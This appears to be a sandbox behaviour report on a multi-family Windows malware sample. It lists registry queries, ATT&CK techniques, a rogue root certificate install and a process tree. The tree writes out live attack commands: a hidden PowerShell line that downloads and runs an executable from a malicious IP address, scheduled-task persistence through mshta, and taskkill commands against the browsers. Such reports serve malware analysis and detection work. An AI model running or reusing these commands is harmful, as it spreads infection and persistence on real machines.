Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	272.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b538167fd6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	44e43277a9.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4124	timeout.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	249	Go-http-client/1.1

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
5248	taskkill.exe
5272	taskkill.exe
3344	taskkill.exe
1948	taskkill.exe
5200	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	firefox.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
4876	reg.exe
4248	reg.exe
4488	reg.exe
5156	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	YMauSAr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	YMauSAr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	YMauSAr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1816	schtasks.exe
2940	schtasks.exe
5588	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3280	powershell.exe
3280	powershell.exe
5116	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
5116	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
5904	rapes.exe
5904	rapes.exe
5660	rapes.exe
5660	rapes.exe
3128	mtCxnCB.exe
3128	mtCxnCB.exe
3128	mtCxnCB.exe
3128	mtCxnCB.exe
3128	mtCxnCB.exe
3128	mtCxnCB.exe
4816	mtCxnCB.exe
4816	mtCxnCB.exe
4816	mtCxnCB.exe
4816	mtCxnCB.exe
4816	mtCxnCB.exe
4816	mtCxnCB.exe
2924	MSBuild.exe
2924	MSBuild.exe
2924	MSBuild.exe
2924	MSBuild.exe
344	MSBuild.exe
344	MSBuild.exe
344	MSBuild.exe
344	MSBuild.exe
3772	274d8a3c45.exe
3772	274d8a3c45.exe
3772	274d8a3c45.exe
3772	274d8a3c45.exe
3772	274d8a3c45.exe
3772	274d8a3c45.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
2704	b538167fd6.exe
2704	b538167fd6.exe
2704	b538167fd6.exe
2704	b538167fd6.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
5264	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
5264	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
6016	44e43277a9.exe
6016	44e43277a9.exe
6016	44e43277a9.exe
6016	44e43277a9.exe
6016	44e43277a9.exe
6016	44e43277a9.exe
1520	rapes.exe
1520	rapes.exe
1752	30c4aed2a1.exe
1752	30c4aed2a1.exe
3556	12ca9c48e4.exe
3556	12ca9c48e4.exe
2692	9sWdA2p.exe
2692	9sWdA2p.exe
2692	9sWdA2p.exe
2692	9sWdA2p.exe
2692	9sWdA2p.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeDebugPrivilege	5152	5uMVCoG.exe
Token: SeDebugPrivilege	2328	5uMVCoG.exe
Token: SeDebugPrivilege	3084	5uMVCoG.exe
Token: SeDebugPrivilege	3344	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	5200	taskkill.exe
Token: SeDebugPrivilege	5248	taskkill.exe
Token: SeDebugPrivilege	5272	taskkill.exe
Token: SeDebugPrivilege	4244	firefox.exe
Token: SeDebugPrivilege	4244	firefox.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	4928	5uMVCoG.exe
Token: SeDebugPrivilege	5684	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
4244	firefox.exe
5656	eb9dcd3c19.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
5656	eb9dcd3c19.exe
4244	firefox.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
3140	7a4616a2d4.exe
3140	7a4616a2d4.exe
3140	7a4616a2d4.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
4244	firefox.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
5656	eb9dcd3c19.exe
3140	7a4616a2d4.exe
3140	7a4616a2d4.exe
3140	7a4616a2d4.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4244	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4128 wrote to memory of 1980	4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 4128 wrote to memory of 1980	4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 4128 wrote to memory of 1980	4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 4128 wrote to memory of 5620	4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 4128 wrote to memory of 5620	4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 4128 wrote to memory of 5620	4128	2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1980 wrote to memory of 1816	1980	cmd.exe	89
PID 1980 wrote to memory of 1816	1980	cmd.exe	89
PID 1980 wrote to memory of 1816	1980	cmd.exe	89
PID 5620 wrote to memory of 3280	5620	mshta.exe	92
PID 5620 wrote to memory of 3280	5620	mshta.exe	92
PID 5620 wrote to memory of 3280	5620	mshta.exe	92
PID 3280 wrote to memory of 5116	3280	powershell.exe	98
PID 3280 wrote to memory of 5116	3280	powershell.exe	98
PID 3280 wrote to memory of 5116	3280	powershell.exe	98
PID 5116 wrote to memory of 5904	5116	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE	100
PID 5116 wrote to memory of 5904	5116	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE	100
PID 5116 wrote to memory of 5904	5116	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE	100
PID 5904 wrote to memory of 5152	5904	rapes.exe	104
PID 5904 wrote to memory of 5152	5904	rapes.exe	104
PID 5152 wrote to memory of 2940	5152	5uMVCoG.exe	105
PID 5152 wrote to memory of 2940	5152	5uMVCoG.exe	105
PID 4020 wrote to memory of 2328	4020	cmd.exe	109
PID 4020 wrote to memory of 2328	4020	cmd.exe	109
PID 5904 wrote to memory of 3128	5904	rapes.exe	111
PID 5904 wrote to memory of 3128	5904	rapes.exe	111
PID 5904 wrote to memory of 3128	5904	rapes.exe	111
PID 5904 wrote to memory of 4816	5904	rapes.exe	113
PID 5904 wrote to memory of 4816	5904	rapes.exe	113
PID 5904 wrote to memory of 4816	5904	rapes.exe	113
PID 5904 wrote to memory of 1096	5904	rapes.exe	114
PID 5904 wrote to memory of 1096	5904	rapes.exe	114
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 1096 wrote to memory of 2924	1096	VrQSuEQ.exe	115
PID 5904 wrote to memory of 4512	5904	rapes.exe	117
PID 5904 wrote to memory of 4512	5904	rapes.exe	117
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 4512 wrote to memory of 344	4512	b8573833a1.exe	118
PID 5904 wrote to memory of 3772	5904	rapes.exe	123
PID 5904 wrote to memory of 3772	5904	rapes.exe	123
PID 5904 wrote to memory of 3772	5904	rapes.exe	123
PID 5904 wrote to memory of 5956	5904	rapes.exe	127
PID 5904 wrote to memory of 5956	5904	rapes.exe	127
PID 5904 wrote to memory of 5656	5904	rapes.exe	128
PID 5904 wrote to memory of 5656	5904	rapes.exe	128
PID 5904 wrote to memory of 5656	5904	rapes.exe	128
PID 5656 wrote to memory of 3344	5656	eb9dcd3c19.exe	129
PID 5656 wrote to memory of 3344	5656	eb9dcd3c19.exe	129
PID 5656 wrote to memory of 3344	5656	eb9dcd3c19.exe	129
PID 5656 wrote to memory of 1948	5656	eb9dcd3c19.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn 40QzBma0SQI /tr "mshta C:\Users\Admin\AppData\Local\Temp\Lueb4sOJD.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn 40QzBma0SQI /tr "mshta C:\Users\Admin\AppData\Local\Temp\Lueb4sOJD.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1816
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\Lueb4sOJD.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5620
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3280
  - - C:\Users\Admin\AppData\Local\TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
      "C:\Users\Admin\AppData\Local\TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5116
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5904
      - C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5152
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "5uMVCoG" /tr "C:\Users\Admin\AppData\Roaming\5uMVCoG.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2940
      - C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3128
      - C:\Users\Admin\AppData\Local\Temp\10478420101\mtCxnCB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478420101\mtCxnCB.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4816
      - C:\Users\Admin\AppData\Local\Temp\10478430101\VrQSuEQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478430101\VrQSuEQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1096
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2924
      - C:\Users\Admin\AppData\Local\Temp\10478590101\b8573833a1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478590101\b8573833a1.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4512
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:344
      - C:\Users\Admin\AppData\Local\Temp\10478600101\274d8a3c45.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478600101\274d8a3c45.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:3772
      - C:\Users\Admin\AppData\Local\Temp\10478610101\8c7784fc03.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478610101\8c7784fc03.exe"
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        
        PID:5956
      - C:\Users\Admin\AppData\Local\Temp\10478620101\eb9dcd3c19.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478620101\eb9dcd3c19.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:5656
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3344
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
